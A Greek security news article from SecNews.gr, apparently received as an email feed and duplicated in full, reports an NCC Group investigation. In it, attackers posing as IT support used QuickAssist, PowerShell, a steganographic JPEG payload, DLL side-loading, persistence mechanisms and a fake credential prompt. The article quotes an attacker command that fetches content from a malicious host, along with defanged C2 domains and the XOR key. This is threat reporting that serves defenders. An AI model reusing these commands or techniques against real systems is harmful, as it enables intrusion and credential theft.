Χάκερ παραβιάζουν εταιρικά συστήματα σε 300 δευτερόλεπτα
SecNews.gr
IT Security News, Gadgets, Tweaks for Geeks and More
Χάκερ παραβιάζουν εταιρικά συστήματα σε 300 δευτερόλεπτα
https://www.secnews.gr/655629/hacker-paraviazoun-etairika-sistimata-300-defterolepta/
Aug 7th 2025, 12:05
by Management Account
Οι χάκερ κατάφεραν να παραβιάσουν εταιρικά συστήματα μέσα σε μόλις πέντε λεπτά χρησιμοποιώντας έναν συνδυασμό τακτικών social engineering και ταχείας εκτέλεσης PowerShell.
Δείτε επίσης: ΗΠΑ: Κινέζοι χάκερ παραβίασαν έως και 115 εκατ. κάρτες πληρωμών
Το περιστατικό, που διερευνήθηκε από την ομάδα Digital Forensics and Incident Response της NCC Group, αποδεικνύει πώς οι κυβερνοεγκληματίες χρησιμοποιούν τις αξιόπιστες επιχειρηματικές εφαρμογές για να παρακάμψουν τα παραδοσιακά μέτρα ασφαλείας.
Οι χάκερ εκτέλεσαν μια προσεκτικά οργανωμένη εκστρατεία στοχεύοντας περίπου είκοσι χρήστες, προσποιούμενοι προσωπικό υποστήριξης IT. Πείθοντας με επιτυχία δύο θύματα να παραχωρήσουν απομακρυσμένη πρόσβαση, οι επιτιθέμενοι εκμεταλλεύτηκαν το εγγενές εργαλείο υποστήριξης απομακρυσμένης πρόσβασης QuickAssist.exe των Windows για να εδραιώσουν μια αρχική πρόσβαση.
Μέσα σε 300 δευτερόλεπτα από την απόκτηση πρόσβασης, οι χάκερ ανέπτυξαν μια σειρά εντολών PowerShell που κατέβασαν επιθετικά εργαλεία και εδραίωσαν πολλαπλούς μηχανισμούς επιμονής (persistence mechanisms). Η ακολουθία της επίθεσης ξεκίνησε με χειρισμό του clipboard χρησιμοποιώντας την εντολή (curl hxxps://resutato[.]com/2-4.txt).Content | Set-Clipboard, ακολουθούμενη από την εκτέλεση obfuscated σεναρίων PowerShell.
Δείτε ακόμα: Χάκερ εκμεταλλεύονται υπηρεσίες link-wrapping για να κλέψουν στοιχεία σύνδεσης του Microsoft 365
Η κύρια λήψη του payload πραγματοποιήθηκε μέσω μιας εξελιγμένης στεγανογραφικής τεχνικής, όπου ο κακόβουλος κώδικας ενσωματώθηκε μέσα σε ένα αρχείο JPEG που φιλοξενείται στο hxxps://resutato[.]com/b2/res/nh2.jpg. Το σενάριο χρησιμοποίησε XOR αποκρυπτογράφηση με έναν 4-byte δείκτη (0x31, 0x67, 0xBE, 0xE1) για να εξάγει και να ανακατασκευάσει ένα αρχείο ZIP που περιείχε τα συστατικά του NetSupport Manager, μεταμφιεσμένα ως λογισμικό "NetHealth".
Χάκερ παραβιάζουν εταιρικά συστήματα σε 300 δευτερόλεπτα
Οι επιτιθέμενοι επέδειξαν προηγμένη τεχνική (tradecraft) εφαρμόζοντας πολλαπλούς μηχανισμούς επιμονής. Δημιούργησαν προγραμματισμένα καθήκοντα (scheduled tasks) ρυθμισμένα να εκτελούνται κάθε πέντε λεπτά χρησιμοποιώντας το regsvr32.exe με τυχαία ονόματα DLL και εδραίωσαν επιμονή μέσω της μητρώου (registry) HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\NETHEALTH.
Το κακόβουλο λογισμικό χρησιμοποίησε νόμιμα δυαδικά αρχεία όπως το msiexec.exe και το GenUp.exe για επιθέσεις side-loading DLL, αναπτύσσοντας το trojanized libcurl.dll συστατικό. Ίσως το πιο ανησυχητικό ήταν η ανάπτυξη μιας εξελιγμένης διεπαφής (GUI) συλλογής διαπιστευτηρίων που μιμήθηκε νόμιμες προτροπές αυθεντικοποίησης του συστήματος.
Η διεπαφή βασισμένη σε PowerShell (C:\Users\{username}\Videos\l.ps1) δημιούργησε μια πλήρως επικαλυπτική οθόνη με μια πειστική προτροπή «Επαλήθευση Διαπιστευτηρίων Συστήματος», καταγράφοντας τα διαπιστευτήρια σε απλό κείμενο στο $env:TEMP\cred.txt. Η διεπαφή απενεργοποίησε κρίσιμες λειτουργίες των Windows, συμπεριλαμβανομένης της πρόσβασης στη γραμμή εργασιών και διάφορων συντομεύσεων πληκτρολογίου, για να αποτρέψει την απόδραση του χρήστη.
Δείτε επίσης: Χάκερ αποκτούν αρχική πρόσβαση σε οργανισμούς με εργαλεία RMM
Η επικοινωνία Command and Control (C2) καθιερώθηκε με πολλαπλά domains, συμπεριλαμβανομένων των resutato[.]com και nimbusvaults[.]com, επιτρέποντας δυνατότητες απομακρυσμένης διαχείρισης. Η επιτυχία της επίθεσης υπογραμμίζει την κρίσιμη ανάγκη για ενισχυμένη εκπαίδευση ευαισθητοποίησης χρηστών και incident response, καθώς ακόμη και σύντομες παραβιάσεις ασφαλείας μπορούν να οδηγήσουν σε σημαντική οργανωτική παραβίαση.
You are receiving this email because you subscribed to this feed at https://blogtrottr.com?lctg=1169672
If you no longer wish to receive these emails, you can unsubscribe here:
https://blogtrottr.com/unsubscribe/nfz/3xfHTz?lctg=1169672
IT Security News, Gadgets, Tweaks for Geeks and More
Χάκερ παραβιάζουν εταιρικά συστήματα σε 300 δευτερόλεπτα
https://www.secnews.gr/655629/hacker-paraviazoun-etairika-sistimata-300-defterolepta/
Aug 7th 2025, 12:05
by Management Account
Οι χάκερ κατάφεραν να παραβιάσουν εταιρικά συστήματα μέσα σε μόλις πέντε λεπτά χρησιμοποιώντας έναν συνδυασμό τακτικών social engineering και ταχείας εκτέλεσης PowerShell.
Δείτε επίσης: ΗΠΑ: Κινέζοι χάκερ παραβίασαν έως και 115 εκατ. κάρτες πληρωμών
Το περιστατικό, που διερευνήθηκε από την ομάδα Digital Forensics and Incident Response της NCC Group, αποδεικνύει πώς οι κυβερνοεγκληματίες χρησιμοποιούν τις αξιόπιστες επιχειρηματικές εφαρμογές για να παρακάμψουν τα παραδοσιακά μέτρα ασφαλείας.
Οι χάκερ εκτέλεσαν μια προσεκτικά οργανωμένη εκστρατεία στοχεύοντας περίπου είκοσι χρήστες, προσποιούμενοι προσωπικό υποστήριξης IT. Πείθοντας με επιτυχία δύο θύματα να παραχωρήσουν απομακρυσμένη πρόσβαση, οι επιτιθέμενοι εκμεταλλεύτηκαν το εγγενές εργαλείο υποστήριξης απομακρυσμένης πρόσβασης QuickAssist.exe των Windows για να εδραιώσουν μια αρχική πρόσβαση.
Μέσα σε 300 δευτερόλεπτα από την απόκτηση πρόσβασης, οι χάκερ ανέπτυξαν μια σειρά εντολών PowerShell που κατέβασαν επιθετικά εργαλεία και εδραίωσαν πολλαπλούς μηχανισμούς επιμονής (persistence mechanisms). Η ακολουθία της επίθεσης ξεκίνησε με χειρισμό του clipboard χρησιμοποιώντας την εντολή (curl hxxps://resutato[.]com/2-4.txt).Content | Set-Clipboard, ακολουθούμενη από την εκτέλεση obfuscated σεναρίων PowerShell.
Δείτε ακόμα: Χάκερ εκμεταλλεύονται υπηρεσίες link-wrapping για να κλέψουν στοιχεία σύνδεσης του Microsoft 365
Η κύρια λήψη του payload πραγματοποιήθηκε μέσω μιας εξελιγμένης στεγανογραφικής τεχνικής, όπου ο κακόβουλος κώδικας ενσωματώθηκε μέσα σε ένα αρχείο JPEG που φιλοξενείται στο hxxps://resutato[.]com/b2/res/nh2.jpg. Το σενάριο χρησιμοποίησε XOR αποκρυπτογράφηση με έναν 4-byte δείκτη (0x31, 0x67, 0xBE, 0xE1) για να εξάγει και να ανακατασκευάσει ένα αρχείο ZIP που περιείχε τα συστατικά του NetSupport Manager, μεταμφιεσμένα ως λογισμικό "NetHealth".
Χάκερ παραβιάζουν εταιρικά συστήματα σε 300 δευτερόλεπτα
Οι επιτιθέμενοι επέδειξαν προηγμένη τεχνική (tradecraft) εφαρμόζοντας πολλαπλούς μηχανισμούς επιμονής. Δημιούργησαν προγραμματισμένα καθήκοντα (scheduled tasks) ρυθμισμένα να εκτελούνται κάθε πέντε λεπτά χρησιμοποιώντας το regsvr32.exe με τυχαία ονόματα DLL και εδραίωσαν επιμονή μέσω της μητρώου (registry) HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\NETHEALTH.
Το κακόβουλο λογισμικό χρησιμοποίησε νόμιμα δυαδικά αρχεία όπως το msiexec.exe και το GenUp.exe για επιθέσεις side-loading DLL, αναπτύσσοντας το trojanized libcurl.dll συστατικό. Ίσως το πιο ανησυχητικό ήταν η ανάπτυξη μιας εξελιγμένης διεπαφής (GUI) συλλογής διαπιστευτηρίων που μιμήθηκε νόμιμες προτροπές αυθεντικοποίησης του συστήματος.
Η διεπαφή βασισμένη σε PowerShell (C:\Users\{username}\Videos\l.ps1) δημιούργησε μια πλήρως επικαλυπτική οθόνη με μια πειστική προτροπή «Επαλήθευση Διαπιστευτηρίων Συστήματος», καταγράφοντας τα διαπιστευτήρια σε απλό κείμενο στο $env:TEMP\cred.txt. Η διεπαφή απενεργοποίησε κρίσιμες λειτουργίες των Windows, συμπεριλαμβανομένης της πρόσβασης στη γραμμή εργασιών και διάφορων συντομεύσεων πληκτρολογίου, για να αποτρέψει την απόδραση του χρήστη.
Δείτε επίσης: Χάκερ αποκτούν αρχική πρόσβαση σε οργανισμούς με εργαλεία RMM
Η επικοινωνία Command and Control (C2) καθιερώθηκε με πολλαπλά domains, συμπεριλαμβανομένων των resutato[.]com και nimbusvaults[.]com, επιτρέποντας δυνατότητες απομακρυσμένης διαχείρισης. Η επιτυχία της επίθεσης υπογραμμίζει την κρίσιμη ανάγκη για ενισχυμένη εκπαίδευση ευαισθητοποίησης χρηστών και incident response, καθώς ακόμη και σύντομες παραβιάσεις ασφαλείας μπορούν να οδηγήσουν σε σημαντική οργανωτική παραβίαση.
You are receiving this email because you subscribed to this feed at https://blogtrottr.com?lctg=1169672
If you no longer wish to receive these emails, you can unsubscribe here:
https://blogtrottr.com/unsubscribe/nfz/3xfHTz?lctg=1169672